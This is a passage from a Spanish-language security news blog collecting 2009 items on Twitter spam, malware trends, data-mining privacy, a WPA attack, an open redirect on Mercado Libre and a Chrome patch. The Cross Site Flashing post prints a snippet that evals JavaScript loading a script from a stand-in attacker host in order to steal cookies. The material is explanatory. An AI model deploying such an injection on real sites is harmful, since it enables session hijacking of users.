Esperamos que la información les sea de utilidad, y les recomendamos hacer uso de estos recursos de denuncia, para así comprometernos entre todos con la seguridad de la web.

Fuente: Laboratorio ESET Latinoamérica

Consejos para prevenir el spam en Twitter

Con lo popular que es twitter muchas personas lo usan y comienzan seguir a otros sin muchas veces revisar a quien seguimos o sencillamente hacer un click en los enlaces que nos envían sin verificar de quien vienen o hacia donde nos pueden dirigir. Así funciona el spam en Twitter.

Bitdefender publicó una serie de consejos para evitar caer en las garras del spam en Twitter.

Tipos de spam mas comunes en Twitter:

  1. Spam de tweet : proviene de alguien del cual el usuario esta actualmente siguiendo y todo el que sigue a ese usuario vera el mensaje.
  2. Mensaje directo : un mensaje directo proviene de alguien que el usuario esta siguiendo y solo el usuario vera el mensaje.
  3. Spam de ReTweet: busca por tweets legítimos y los reporta en el sistema pero con una URL diferente y que apunta a un sitio con malware.
  4. Spam de temas de tendencias: busca por temas populares en twitter y publica tweets similares que contienen URLs maliciosas.
  5. Spam de seguimiento: suceden cuando un perfil de usuario recibe muchos seguidores que el usuario no conoce. Si el usuario no comienza a seguirlos en una semana, ellos paran de seguir al usuario. Estadísticas muestran que uno de cada dos usuario hará un seguimiento. Usualmente estos perfiles son bots que están programados para adquirir tantos seguidores como sea posible antes de comenzar a enviar spam.

Con estos cinco consejos podremos podemos ayudarnos a ser presa del spam:

  1. Instale una solución completa de seguridad en su computador que contenga antivirus, cortafuegos y un filtro de phishing.
  2. Siga a perfil de spam en Twitter http://twitter.com/spam para encontrar mas y buenos consejos sobre el spam.
  3. No haga click en todos los enlaces que recibe.
  4. Deshabilite la opción de “auto seguimiento”.
  5. Asegúrese de conocer a quien esta siguiendo.
Fuente: Tecnoseguridad

La lista negra de Google con sitios peligrosos se duplicó en los últimos 12 meses

El equipo de seguridad de Google ha presentado algunos datos sobre la cantidad de sitios maliciosos presentes en la red, según su herramienta anti-malware.
Como se puede apreciar, el número de sitios se duplicó en el último año, acentuándose sobre todo desde abril/mayo de 2009. Google también asegura que durante algunos periodos se detectaron 40 mil nuevos sitios comprometidos por semana. Si bien la aparición de páginas maliciosas o comprometidas por ataques no se puede negar, el aumento del gráfico también puede estar influenciado por las mejoras de Google en las herramientas de detección.

Por otro lado se informa un descenso general de alertas en los resultados de búsqueda, menos del 1% de las búsquedas realizadas por los usuarios tienen al menos un resultado marcado como potencialmente peligroso.

Las advertencias de seguridad se producen gracias a la API de navegación segura o Safe Browsing API, que compara las URL con una lista negra de sitios que constantemente se actualiza. Los navegadores Chrome, Firefox y Safari la utilizan para proteger a sus usuarios.

Fuente: Spamloco

Análisis forense de Mozilla Firefox 3.x

Para un análisis forense de Mozilla Firefox 3.X es necesario saber, cómo y dónde, el navegador guarda la información del historial de navegación, correspondiente a cada usuario del sistema.

Mozilla Firefox 3.X utiliza bases de datos SQLite para almacenar el historial de los usuarios y mas información de interés para un análisis forense.

Contenido completo en Guru de la Informática

Entrevista a Richard Stallman (otra más)

Desde hace veinticinco años, el estadounidense Richard Stallman brega por un software libre como vía hacia una sociedad digital justa. De paso por Buenos Aires, en este diálogo el inventor del copyleft desarrolla algunas de sus ideas más polémicas. Además, un análisis de la dimensión política del fenómeno.

Richard Stallman viaja por el mundo dando conferencias encendidas con el evangelio del Software libre bajo el brazo, coquetea con sus ambiciones actorales en un sketch en el que se disfraza de San IGNUcio, el santo del GNU (sistema operativo que Stallman creó y defiende), usando un viejo disco rígido a manera de aureola y huye de cualquier posibilidad de vigilancia. Virtual o real. Así, esquiva los hoteles para que los gobiernos no sepan dónde está, reniega del celular para que no puedan rastrearlo y sólo usa su computadora Lemote, una netbook china que a diferencia de la mayoría de las portátiles del mundo no permite que Windows haga pie en ella y sí su GNU, que en combinación con Linux, es el programa más conocido de software libre. Gratuito, amenaza la hegemonía de Windows de Microsoft.

Contenido completo en Revista EÑE

Se crean más de 3.500 sitios web al día para difundir malware

Cuando uno lee informaciones como esta de MessageLabs (ENG), te quedas pensando en lo “rentable” que puede llegar a ser la “industria” del phising, spam o todos los tipos de malware o software malicioso que pueden llegar a través de la Red.

Además, esta oscura industria está encontrando en las redes sociales a su mejor aliado para complementar las técnicas habituales de engaño-infección. No es la primera vez que decimos que se tenga precaución con los enlaces que usuarios aparentemente de fiar dejan en el muro o tablón de mensajes del FaceBoock o Twitter de turno. Puede servirnos el mismo ejemplo para las conversaciones a través de programas de mensajería instantánea, foros y un largo etc.

Como se puede leer en el título, cada día ven la luz más de 3.500 sitios web dedicados a difundir todo tipo de malware y este hecho debería hacernos reflexionar acerca de la cantidad de amenazas que llegan a través del cable. Se habla también de un aumento del Spam del 85 % respecto al año 2007 y según MessageLabs, parece que en China se puede encontrar alguna respuesta a este hecho. Los paises con más alto nivel de Spam serían Reino Unido, China, Australia, Japón, Alemania, los EE.UU, Países Bajos y Canadá.

Siguiendo con el malware que llega a nuestro correo, el Spam o correo no solicitado se lleva la palma, pero se informa de que uno de cada 304 correos electrónicos de media contiene un virus. Otro dato interesante es que el reparto de esos 3.500 sitios web maliciosos que nacen cada día, es más o menos de unos 250 dedicados a alojar software espía y unos 3.300 a los virus.

Fuente: Daboweb

Nuestros datos adelantan nuestros actos

Cada día generamos una gran cantidad de información sobre nosotros mismos: Muchas veces somos conscientes de ello: al pagar con la tarjeta de crédito o al reservar un billete de avión, pero otras veces no nos damos cuenta de la información que estamos produciendo, por ejemplo, cuando pasamos por un tramo de carretera en la que se está contabilizando el número de vehículos que pasan por minuto o cuando se realiza un seguimiento sobre nuestra navegación por Internet. En la mayoría de los casos, toda esta información es guardada en grandes bases de datos, cuyo número ha ido aumentando progresivamente.

El data mining (minería de datos) es una tecnología basada en un conjunto de técnicas matemáticas, estadísticas, informáticas, etc. orientadas al tratamiento y análisis de grandes volúmenes de información que permite identificar patrones estables que expliquen el comportamiento de estos registros en un determinado contexto. Así pues, la minería de datos se apoya en una combinación de aplicaciones informáticas y en la utilización de algoritmos de tratamiento de información, desde los más simples y conocidos (estadísticos, relacionales, predictivos...) hasta aquellos más complejos como las redes neuronales artificiales, los árboles de decisión, los algoritmos genéticos o las reglas de inducción.

Si la atribución de un significado a los datos los convierte en información, la interpretación de ésta es conocimiento. Y es en esta parte del proceso en la que interviene el data mining, que busca patrones reconocibles entre los datos para predecir tendencias y comportamientos futuros.

"El floreciente mundo de los datos es un laboratorio gigante sobre el comportamiento humano. Es una mesa de operaciones para las ciencias sociales, el comportamiento económico y la psicología", escribe Stephen Baker en el ensayo The Numerati. How they'll get my number and yours.

Una de sus aplicaciones más evidentes en el ámbito empresarial es tomar una base de datos de clientes e "interrogarla" para orientar las futuras acciones de marketing en función de la información obtenida (hábitos de compra, percepción publicitaria, etc.), pero además existen otras aplicaciones de esta técnica, entre las que cabe destacar:

  • Predicción del patrón de voto de los electores para poder personalizar el mensaje del candidato, como aplicación en los procesos electorales.
  • Recopilación de grandes bases de datos biológicos para emplearlos en la detección a tiempo de tumores, demencias o alzhéimer.
  • Lucha contra el terrorismo mediante la localización de relaciones, transacciones económicas y movimientos de sospechosos.
  • Cuantificación de las habilidades de los trabajadores de una empresa para aprovecharlas al máximo así como localizar trabajadores descontentos.

Sin embargo, esta técnica es cuestionable desde el punto de vista de la debida garantía de privacidad de nuestros datos personales. Así, la acumulación innecesaria de información es uno de los fenómenos más preocupantes de la minería de datos y está en directa relación con el control de las personas, que puede acabar siendo perjudicial para las libertades en la Sociedad de la Información.

Por poner un ejemplo, Google – empresa acostumbrada a trabajar con inmensas bases de datos – actualmente aplica la minería de datos en la gestión de los recursos humanos de su propia plantilla. Ante la marcha de algunos cargos estratégicos (ingenieros, diseñadores y ejecutivos de ventas), la compañía está desarrollando una herramienta que a partir de entrevistas, registros de nóminas y ascensos y evaluaciones de compañeros, etc le permitiría conocer el estado de ánimo de sus trabajadores y averiguar cuáles se plantean marcharse, según publicó recientemente The Wall Street Journal.

En Estados Unidos la privacidad de los empleados está claramente definida: el empresario, como propietario de los medios de la empresa, puede entrar a conocer los datos generados así como estudiar calendarios electrónicos, registros laborales y currículos. En España, el Tribunal Supremo en un sentencia de 2007 considera que los empresarios pueden rastrear toda esa información pero tienen la obligación de avisar antes a los empleados de cualquier supervisión de sus comunicaciones a través de Internet, y deben establecer protocolos. La Agencia Española de Protección de Datos (AEPD) ha considerado que el tipo de servicios que se ponen a disposición de los empleados son dignos de protección, pero su propia instrucción recoge que si el empresario avisa de que podrá acceder o accederá a emails e historiales y se protocoliza, la práctica sería legal. En cualquier caso, son situaciones nuevas, sobre las que existe escasa jurisprudencia, y la cobertura legal va avanzando para adaptarse

Un artículo escrito por David Gutiérrez Rubio para la revista Begins nos plantea un uso fraudulento de la minería de datos, en relación a la invasión de la privacidad. De manera ficticia, el protagonista de esta narración, recauda de forma ilegal, información de la población a nivel mundial, en un principio datos inofensivos, pero que cruzándolos con otros datos también inofensivos y mediante deducciones lógicas y probabilísticas, consigue crear un registro exponiendo en él los nombres de esas personas así como sus costumbres y comportamientos.

Hasta cierto punto esperamos que nuestros actos en el ámbito laboral sean examinados, pero una vez que dejamos a un lado nuestro entorno de trabajo los actos cotidianos de cada uno siguen engrosando esas extensas bases de datos sin que nosotros seamos conscientes de ello, restringiendo nuestras libertades.

Algunas preguntas que se plantean son: ¿Hasta que punto es legal que se compile toda esa información sobre nosotros mismos y en cierta manera se controle a las personas?. ¿Cuándo esa acumulación de información llega a ser innecesaria y se vulnera así nuestra privacidad, infringiendo las leyes de protección de datos?.

Fuente: Blog Inteco

El Cloud computing o Computación en la nube: un próximo reto en seguridad

La "Computación en nube" o "Cloud Computing" es una de las tecnologías sobre las que más se habla en la actualidad. Este sistema permite a los usuarios, entre otros usos, almacenar toda la información, ficheros y datos, en servidores de terceros, de forma que puedan ser accesibles desde cualquier terminal con acceso a la “nube” o red, que generalmente suele ser Internet. Incluso resulta innecesario instalar programas en el propio ordenador del usuario, salvo el navegador que permite el acceso a Internet.

Ejemplos de implementaciones de este tipo de servicios existen varios, pasando desde el correo electrónico en línea, que incluye además calendario, aplicaciones de ofimática, lectores de noticias o páginas de almacenamiento de datos, o incluso por sistemas operativos en la nube, que operan desde Internet y que, además de las aplicaciones básicas y funcionalidad por defecto de un sistema operativo, incluye aplicaciones como suite ofimática (procesador de textos, hoja de cálculo), calendario, gestor de archivos, cliente de mensajería instantánea, calculadora, etc.

Y una de las razones por las que se ha convertido en una tecnología muy comentada en la actualidad, es su mínimo coste y/o la reducción del mismo para el usuario final. Las TIC están influenciadas por todo el marco económico que las rodea y, por ello, se presentan nuevos desarrollos tecnológicos que, entre otros, priman el componente económico, y los beneficios que estos nuevos sistemas reportan a la hora de su implantación. Sin embargo, además del matiz económico que ofrece esta tecnología, presenta otras ventajas, y entre las más importantes podemos señalar:

  • Posibilidad de acceso en cualquier momento del día a los datos.
  • Posibilidad de acceso desde cualquier lugar del mundo desde donde exista una conexión vía Internet.
  • Mínimo coste y ahorro importante de dinero, dado que no es necesario realizar una inversión en software.
  • Las configuraciones previas y posibles incidencias técnicas futuras, que pueden sufrir usuarios y empresas, se trasladan a las empresas proveedoras de este servicio. El mantenimiento y soporte de las aplicaciones corre a cargo del proveedor.
  • Capacidad de almacenamiento casi ilimitada. La cantidad de datos almacenados no tiene apenas límite físico, y es más que suficiente para un usuario doméstico o incluso una empresa.
  • Adaptabilidad: la posibilidad de dimensionarse, escalar la producción o el uso, según las necesidades, y estar rápidamente actualizados en tecnologías.

Sin embargo, este servicio asociado a la Web 2.0, trae consigo una serie de dudas, entre ellas las consideraciones sobre la seguridad de estos sistemas, y la confidencialidad de los datos que el usuario hace residir en ellos.

En general, gran parte de la funcionalidad de este servicio se basa en la confianza que desposita el usuario en almacenar fotos, videos, o datos de naturaleza más privada, en dichos servicios. Y esto genera en los usuarios una serie de preguntas:

  • ¿Es seguro el servidor donde almacenamos los datos?
  • ¿La empresa que prové de dicho servicio cumple extrictamente con toda la normativa sobre protección de datos?
  • ¿Sólo yo tengo acceso a la información que se coloca en la nube? ¿Cómo puedo estar seguro de ello?
  • En general ¿Se cumplen los estándares de protección de datos?

Por ello, y como fundamento de esta tecnología, debe disponerse cómo ofrecer y establecer métodos técnicos seguros y fiables, que proporcionen la confianza necesaria para que el usuario adopte estos sistemas. Esta nueva tecnología (computación en la nube) ya se está planteado como un importante campo de investigación dentro del área de la seguridad en un futuro cercano, como así lo afirma Ronald Rivest, profesor del Instituto Tecnológico de Massachusetts (MIT), añadiendo que es optimista acerca del futuro de esta tecnología, pero que conllevará un esfuerzo importante el hacerla segura. Lo que confirman las declaraciones de John Chambers, CEO de Cisco Systems, acerca de las repercusiones y dificultades de hacer segura la computación en la nube.

Ahora bien, según las conclusiones de un reciente estudio de la Universidad de Berkley (Above the Clouds: A Berkeley View of Cloud Computing), no existen grandes obstáculos para crear un entorno seguro y poder aplicar esta tecnología con total garantía. En dicho estudio se señala además que muchos de los obtáculos que pudieran aparecer se pueden superar con tecnologías de seguridad ya existentes y otras nuevas, como por ejemplo las basadas en el almacenamiento de datos cifrados (encriptación), o utilizando lo que se denominan VLAN (o ’red de área local virtual’) que consiste en crear redes de comunicación independientes dentro de una misma red física.

Parece claro que el futuro de la computación en nube debe configurarse dentro un marco de seguridad, estableciendo los principios y medidas técnicas que deben regir dicha tecnología, y teniendo presente que, bajo el objetivo de ofrecer al usuario nuevos servicios y con un coste económico menor, se deben garantizar los principios básicos de la Seguridad de la Información en cualquier empresa: Disponibilidad, Confidencialidad e Integridad.

Fuente: Inteco

28 ago 2009

Un tribunal holandés obliga a Mininova a retirar los contenidos con copyright

La sala considera que el segundo mayor portal de P2P incita a violar el copyright y le amenaza con una multa de 5 millones.

Un tribunal holandés ha obligado a Mininova , el segundo mayor portal de archivos P2P del mundo, a retirar todos los enlaces que lleven a contenidos sujetos a derechos de autor. La sala le ha dado un plazo de tres meses. Si no lo cumple, se enfrenta a una multa de 5 millones de euros, según informa la web Torrentfreak . La sentencia se conoce un día después de que un tribunal sueco obligara a un proveedor de banda ancha a desconectar The Pirate Bay (TPB), el mayor portal de P2P del mundo. TPB obtuvo acceso a otro proveedor y ya funciona con normalidad.

¿Es delito bloquear software en Internet?

Por Macarena Pereyra Rozas (*) Con motivo del fallo de la Corte de Apelaciones del Distrito Oeste de Washington, caratulado "Zango contra Kaspersky Lab", resulta interesante imaginar qué hubiera ocurrido si se hubiesen aplicado las leyes vigentes en la Argentina.

Según el fallo, Zango es una empresa que provee el acceso a un catálogo de vídeos online, juegos, música y otras herramientas, siempre que el consumidor acepte recibir publicidad mientras navega en la Web. Para ello previamente debe bajarse el usuario un software que acepte publicidad en línea mientras navegue en Internet. A su vez, Kaspersky es una empresa que provee software de seguridad para Internet que, entre otras cosas, bloquea software malicioso, pudiendo el usuario configurar el esquema de seguridad deseado e incluso aceptar contenido no deseado si así lo configurare.

Ante esto, Zango demandó a Kaspersky para que dejara de clasificar a los productos de la empresa como maliciosos y posibles spyware y malware. La clasificación de los programas de Zango bajo esa categoría implicaba que los mismos fueran bloqueados por Kaspersky y, por lo tanto, inaccesibles para el usuario de esta empresa.

Contenido completo en en Bloggers Report

Guía para frenar el Cibercrimen

Los ciberataques son una nueva forma de delincuencia online. Gracias al desarrollo de las nuevas tecnologías y a la gran penetración de las mismas en los hogares, han evolucionado y adquirido niveles de peligrosidad inauditos. Los delincuentes han encontrado un auténtico filón en esta modalidad ya que todos los usuarios de Internet somos víctimas potenciales.

El objetivo de esta guía es proporcionar unas pautas básicas para protegerse de los ciberdelincuentes y facilitar al lector una “enciclopedia básica” sobre las última modalidades de riesgo online.

Fuente: Kaspersky

El ataque a WPA se reduce a un minuto

Dos investigadores japoneses han descubierto un ataque sobre WPA que permitiría romper el cifrado en un minuto. Toshihiro Ohigashi de la universidad de Hiroshima y Masakatu Morii de la universidad de Kobe presentaran los detalles del ataque en una conferencia que tendrá lugar en Hiroshima el próximo 25 de septiembre.

Como ya comentamos en "Una al día" en la pasada conferencia PacSec 2008, los investigadores alemanes Mark Tew y Martin Beck presentaron un ataque que permitía romper parcialmente el cifrado usado por WPA en un tiempo de 12 a 15 minutos usando una técnica similar a "Chopchop", empleada en los ataques al protocolo WEP.

Dicho ataque estaba limitado a implementaciones que soportan características de QoS, mientras que con esta nueva aproximación, basada en el trabajo de Tew y Beck, cualquier implementación WPA es susceptible de ser vulnerable y en un tiempo bastante más reducido.

Ambos ataques se limitan a WPA usando TKIP -Temporal Key Integrity Protocol- una versión modificada de WEP, con lo cual no afectaría a WPA usando AES ni al protocolo WPA2.

Aclarar también que el ataque no tiene como objetivo extraer la llave PSK, fundamental para emplearla en la negociación de conexiones con el punto de acceso. De momento, los ataques a WPA tan solo se pueden emplear para inyectar un determinado número de paquetes falsificados en el tráfico.

10/11/2008 Ahora sí, TKIP usado en WPA parece estar herido de muerte
http://www.hispasec.com/unaaldia/3670

A Practical Message Falsification Attack on WPA [PDF]
http://jwis2009.nsysu.edu.tw/location/paper/A%20Practical%20Message%20Falsification%20Attack%20on%20WPA.pdf

New attack cracks common Wi-Fi encryption in a minute
http://www.thestandard.com/news/2009/08/26/new-attack-cracks-common-wi-fi-encryption-minute

David García
[email protected]

Fuente: Hispasec

Empresas preocupadas por lo que dicen sus empleados

El 63% de las empresas se muestran preocupadas por la posibilidad de que sus trabajadores revelen demasiada información en las redes sociales de internet y que esto las ponga en peligro, según una encuesta realizada por la compañía de seguridad informática Sophos.

Las redes sociales ya forman parte de los hábitos diarios de muchos trabajadores, que acceden a ellas para establecer relaciones con otras personas, ver fotos o actualizar sus perfiles.

Este uso frecuente sitúa a sitios como Twitter, Facebook, MySpace o LinkedIn en el punto de mira de "cibercriminales" que utilizan estas plataformas para acceder a identidades de los usuarios, difundir programas dañinos o enviar anuncios publicitarios, según dice Sophos en una nota.

El estudio indica que una cuarta parte de las compañías encuestadas ha sido víctimas durante este año de ataques de "spam, phishing o malware", que comprometen la seguridad del ordenador o consiguen robar información personal, lo que convierte el acceso a estas redes en unas de las principales preocupaciones para estas empresas.

Twitter ha sido objeto de numerosos ataques cibernéticos, como el envío masivo de "spam" por parte de un usuario que consiguió colapsar el servidor, o la presencia de numerosos anuncios de contenido provocativo que acaban conectando al internauta otras páginas de contenido para adultos.

"Mientras las estafas continúen encontrando un público, los defraudadores seguirán explotando las redes sociales para robar información y difundir más ataques; sin embargo, la prohibición del acceso a estas redes en el lugar de trabajo puede ser una estrategia que cause más daño que bien", ha subrayado Sophos.

Considera que la prohibición del acceso no impediría que estos usuarios dejaran de utilizar las redes sociales, sino que les animaría a buscar nuevas vías, algo que acabaría abriendo "agujeros en la seguridad corporativa".

Por ello, esta compañía de seguridad aconseja no actuar contra las redes sociales, sino que anima a encontrar una fórmula para sacarles el máximo provecho, como por ejemplo contactar con clientes actuales y potenciales.

Educar a los trabajadores sobre el peligroso impacto que conlleva el acceso a determinadas páginas de internet, realizar un filtrado de acceso de algunos sitios de redes sociales, comprobar la información que su organización y el personal comparten en la red o revisar con regularidad la configuración de seguridad de la empresa son otras de las recomendaciones que sugiere Sophos.

Fuente: Cinco Dias

27 ago 2009

XSF: Cross Site Flashing. Ataque web encapsulado en Flash

Supongo que nuestros lectores habrán oido hablar del gusano que afectó a la red social Twitter allá por el mes de abril. De hecho, Laura publicó un artículo sobre la contratación del creador del mismo aquí. El ataque consistía en que gracias a una vulnerabilidad del tipo XSS (Cross-Site Scripting) permitía suplantar la identidad de un montón de usuarios atacados y twittear desde su cuenta.

En este caso, el objetivo de los ataques ha sido la red social china Renren. Para ello se ha utilizado una variante de ataque XSS encapsulado mediante archivos Flash. Como resultado, este ataque se ha llamado XSF o Cross Site Flashing.

¿Cómo se llevó a cabo el ataque?
La red social Renren permite, al igual que otras como Facebook o Tuenti, permite compartir contenido multimedia. Para ello se puede hacer mediante videos o en formato Flash. Para este último, el enlace a un fichero SWF, se hace mediante una función llamada playswf() que crea una porción de código así:
<embed src=”"+o.filename+”” type=”application/x-shockwave-flash”
“+”width=”"+(o.width||”320″)+”” height=”"+(o.height||”240″)+”” allowFullScreen=”true”
wmode=”"+(o.wmode||”transparent”)+”” allowScriptAccess=”always” ></embed>

Atención especial merece el parámetro allowScriptAccess. Gracias a él se limita el nivel de acceso que el objeto "embebido" tendrá sobre el resto de la página HTML. Si se asigna "allowScriptAccess=sameDomain" el objeto flash, sólo tendrá acceso a la página HTML si se llama desde el mismo dominio, haciendo falta que el atacante subiera el fichero a ejecutar al mismo dominio, utilizando alguna otra técnica.
Sin embargo, en condiciones en las que el parámetro allowScriptAccess tenga el valor "always", el objeto flash tiene acceso a cualquier parte de la sesión HTML, como por ejemplo, las cookies. 1, 2, 3,... responda otra vez: Las Cookies.

A partir de aquí el resto del ataque consiste en crear un objeto flash en el que se pueda incluir en el fichero Flash una porción de código que ejecute un Javascript malicioso que envíe las cookies de los usuarios que vean ese "inocente" flash a una localización remota. A partir de ahí el atacante contará con acceso a la identidad de un montón de usuarios.

Por ejemplo,
var fun = 'var x=document.createElement("SCRIPT");x.src="http://www.delatacante.com/malicioso.js"; x.defer=true;document.getElementsByTagName("HEAD")[0].appendChild(x);';
flash.external.ExternalInterface.call('eval', fun);

Asimismo, el usuario final verá el flash sin saber que ha ejecutado código Javascript malicioso robando su cookie.

El ataque a la red social Renren, además consistía en aprovechar las credenciales del individuo para enviar el video a todos sus contactos.

Como podéis ver, XSS encapsulado en un objeto Flash embebido en una página web... gracias a excesivos permisos para ese objeto. Recomendación, si tenéis algún tipo de sitio web que permita compartir este tipo ficheros, forzad el parámetro "allowScriptAccess" a "samedomain".

Fuente: Security by Default y Sophos

Vulnerabilidad al visualizar archivos Excel desde diferentes programas

Se ha anunciado una vulnerabilidad de desbordamiento de búfer en una librería empleada por diversos programas para la visualización de archivos en formato Excel por la que un usuario remoto podría provocar la ejecución de código arbitrario en los sistemas afectados. El problema se ha confirmado que afecta a IBM Lotus Notes (versiones 6.5, 7.0, 8.0 y 8.5) y en múltiples productos Symantec.

El problema reside en el Autonomy KeyView SDK un SDK comercial que proporciona múltiples librerías para el tratamiento de archivos en diferentes formatos, entre los que se incluye el formato Microsoft Excel 97 (XLS). Son muchos los productos que hacen uso de esta librería, entre los programas confirmados como afectados se encuentran IBM Lotus Notes y múltiples productos Symantec, aunque la lista puede ser más extensa.

Un atacante remoto podría crear un archivo malicioso con formato de hoja de calculo Microsoft Excel para posteriormente enviarlo como adjunto. En el caso de Lotus Notes se requiere que el usuario abra el adjunto lo que provocaría un desbordamiento de búfer con posibilidad de ejecución de código arbitrario. Sin embargo en otros casos, el proceso puede realizarse de forma automática por la aplicación cuando examina el documento. Las circunstancias específicas dependen de la aplicación atacada.

Los privilegios que el atacante conseguirá también dependerán de la aplicación que hace uso de la librería. En Lotus Notes el código se ejecutará con los privilegios del usuario atacado, mientras que en Symantec Mail Security permite obtener privilegios del sistema.
Antonio Ropero

Fuente: Hispasec

IBM informa un enorme crecimiento de enlaces maliciosos

Los hackers [maliciosos] usan técnicas cada vez más sofisticadas para engañar a los usuarios y eludir herramientas de seguridad.

El número de enlaces a páginas web maliciosas se ha disparado más de un 500 por ciento en la primera mitad de este año, ya que los hackers se enfocaron en hacer caer en la trampa a los usuarios confiados a donde quiera vayan en Internet, según una nueva investigación de IBM.

El Informe de Tendencias y Riesgos de X-Force 2009 Mid-Year encuentra que los que escriben malware están utilizando formas cada vez más sofisticadas de infectar a los usuarios, incluyendo comprometer sitios legítimos y publicar enlaces maliciosos en blogs y páginas de redes sociales.

"Parece que hay un incremento en los casos de URLs que enlazan a sitios maliciosos dentro de los sitios confiables tales como las redes sociales, porque la gente es mucho más probable que siga esos enlaces," dice James Rendell, especialista senior en tecnología de IBM X-Force.

Por el lado de aplicaciones web, los hackers prefieren los ataques de inyección SQL y de XSS para infectar a los visitantes de sitios legítimos los cuales han sido hackeados con Troyanos de robo de información. Los ataques de SQL crecieron 50 porciento del cuarto trimestre de 2008 al primer trimestre de 2009, y después casi se duplicaron del primer trimestre al segundo de este año.

Justo ayer, se informó que un solo ataque SQL comprometió más de 50.000 sitios.

IBM también informó un crecimiento en el número de taques ofuscados contra vulnerabilidades de los navegadores para poder eludir la detección de herramientas convencionales.

El informe destaca un aumento de 100 por ciento en el volumen de estos ataques entre el primer y segundo trimestr de 2009, con las explotaciones PDF particularmente predominantes a medida que los metodos de hacking se vuelven más sofisticados, dijo Rendell.

El phishing ha disminuido dramáticamente este año, según el informe, pero no hanrá alivio para los bancos y otras instituciones atacadas ya que IBM cree que los troyanos personalizados para robo de información cada vez se usan más para hacer el mismo trabajo más efectivamente. Impulsados por esta nueva tendencia, los Troyanos componen el 55 porciento de todo el malware nuevo de la primer mitad de este año, dice IBM.

Finalmente, el crecimiento de nuevas vulnerabilidades parece haberse desacelerado un poco. El volumen actual de nuevas vulenerabilidades encontradas cayó ocho por ciento comparado con la primer mitad de 2008, pero casi la mitad continúan sin solucion por parte de los fabricantes, según Rendell.

"Los proveedores de sistemas de aplicaciones Web tienen fuerte presencia entre aquellas vulnerabilidades sin emparchar," agregó, "En términos de todas las reveladas Apple está primero, pero esto de ninguna manera refleja la calidad del software, sólo que la firma está siendo diligente en liberar parches y revelar vulnerabilidades."

Traducción: Raúl Batista - Segu-info
Autor: Phil Muncaster
Fuente: v3.co.uk

Autores brasileros de malware tropiezan de nuevo

Me gusta molestar a los que escriben malware, especialmente los que son tontos, como pueden ver aquí. Algunas veces son un blanco muy grande para ignorarlos.

La última vuelta es de nuevo con los autores brasileros de malware. Como saben, hace algunos días se descubrió un virus en Delphi; lo detectamos como W32/Induc. Así es que hoy tuve un malware brasilero de robo de contraseñas bancarias (PWS-banker) que estaba infectado, adivinen ¿con qué? - ¡el virus delphi W32/Induc! Que ironía.

Allá por el 2007, escribí acerca de algo bastante parecido aquí. Y, sorprendentemente, era otro malware PWS-banker.

Asi que por favor autores de malware, repitan conmigo: "Debo instalar software anti-virus. Debo instalar software anti-virus."

Hoy día, se puede comprar un malware brasilero PWS-banker a la medida por unos US$50. Eso puede explicar porque son hechos tan baratos.

Traducción: Raúl Batista - Segu-info
Autor: Pedro Bueno
Fuente: McAfee Avert Labs Blog

26 ago 2009

Debilidad en sitio de Mercado Libre solucionada

En las últimas horas hemos denunciado el caso de la debilidad en el sitio de Mercado Libre. En el caso analizado se presentaba un correo al usuario, en donde, la parte de la URL que ha sido tapada contiene una redirección a un sitio que descargaba un malware:
Desde Segu-Info hemos podido constatar que la vulnerabilidad existía en el sitio web de Mercado Libre en cualquier idioma (BR en la imágen). En este caso el archivo descargado correspondía a un conocido troyano del tipo Downloader.

La vulnerabilidad se encontraba en la forma que era manipulado el parametro "go" recibidos en el script "ml.track.me", ya que era posible redirigir al usuario a un sitio malicioso a través del mismo, permitiendo ataques de phishing, descarga de malware o cualquier otro que fuera realizado a través de la redirección maliciosa.
Este tipo de ataque extremadamente sencillo demuestra lo común que es cometer un error (u omisión) en la limpieza de variables de entrada, sobre todo los parámetros recibidos por sitios web.

Un ejemplo sencillo es el siguiente, en donde se redirigía al usuario a Google:
http://www.mercadolibre.com.ar/jm/ml.track.me?k1=FOOT&k2=EBAY&go=http://www.google.com/

En el caso del malware detectado, el usuario descargaba un archivo ejecutable y podía pensar que lo estaba haciendo desde el sitio de Mercado Libre, cuando en realidad lo hacía desde el sitio al cual había sido redireccionado sin saberlo.

Si bien la respuesta inicial a través de los canales de denuncia clásicos de Mercado Libre fue erronea, luego de establecido el contacto con el personal de la empresa, la respuesta fue excelente, así como el tiempo que se han tomado en la solución. Esto significa que debería reveer su canal de denuncia actual, ya que el usuario promedio dificilmente acceda a contactos de la empresa, en caso de querer realizar algún tipo de denuncia.

Desde Segu-Info también agradecemos a la empresa por su correo de agradecimiento.

Cristian de la Redaccción de Segu-Info

Phishing al Banco Frances (Argentina) a través de troyanos

Nos han reportado un caso de Phishing al Banco Frances (Argentina), el cual es producido por un troyano del tipo QHost, que modifica el archivo "hosts" del sistema y cada vez que el usuario intenta ingresar al sitio del banco, ingresará al sitio falso, alojado en una dirección IP:


Este tipo de troyanos son peligrosos ya que un usuario sin experiencia, podría ser engañado a través de esta técnica.

Cristian de la Redacción de Segu-Info

Chrome arregla dos fallos de seguridad graves

Google acaba de solucionar dos vulnerabilidades graves en la versión estable de Chrome, que pueden hacer que un usuario malicioso tome el control del ordenador afectado.

Con un ataque dirigido al motor JavaScript de Chrome, un código malicioso insertado en una web permite al atacante tener acceso a información privada e incluso ejecutar código arbitrario.

El otro fallo explotaba información formateada en XML que causaba un bloqueo en la pestaña que la cargaba, y permitía la ejecución de código arbitrario, pero sólo dentro del sandbox del navegador.

Tan sólo hay que instalar la última versión de Chrome para tapar los boquetes. Puede hacerse desde el cuadro “Acerca de Chrome” en el menú de ayuda, o bien descargarlo desde el enlace al pié del artículo. Comprobad que la versión instalada es la 2.0.172.43 o posterior.

Google también ha indicado que no publicará información precisa sobre cómo explotar las vulnerabilidades hasta que la mayoría de usuarios hayan actualizado.

Bueno, para los que decían que Chrome no tenía fallos, que quede claro que es una afirmación peligrosa. Todos los navegadores están expuestos a fallos: lo importante es lo que tarden en arreglarlos.

Vía | CNet News
Enlace | Descarga de Chrome

Fuente: Genbeta

Incidentes y responsabilidades

Habitualmente, los que nos dedicamos a esto de la seguridad solemos hablar de riesgos, de controles, de prevención... Sí, también hablamos de incidentes de seguridad, pero habitualmente desde un punto de vista positivista: procedimientos de gestión, minimización de los efectos de los incidentes, etc. Pero muchas veces se nos olvida hablar de la cruda realidad: los incidentes ocurren. Y cuando ocurren, duelen.

Efectivamente, por mucha seguridad que tenga una organización, por mucho SGSI que tenga implantado y por muy bien que venda su certificado, nadie se libra de sufrir incidentes de seguridad. Tarde o temprano, a todo el mundo le toca. Y qué supone sufrir un incidente de seguridad? Veamos:
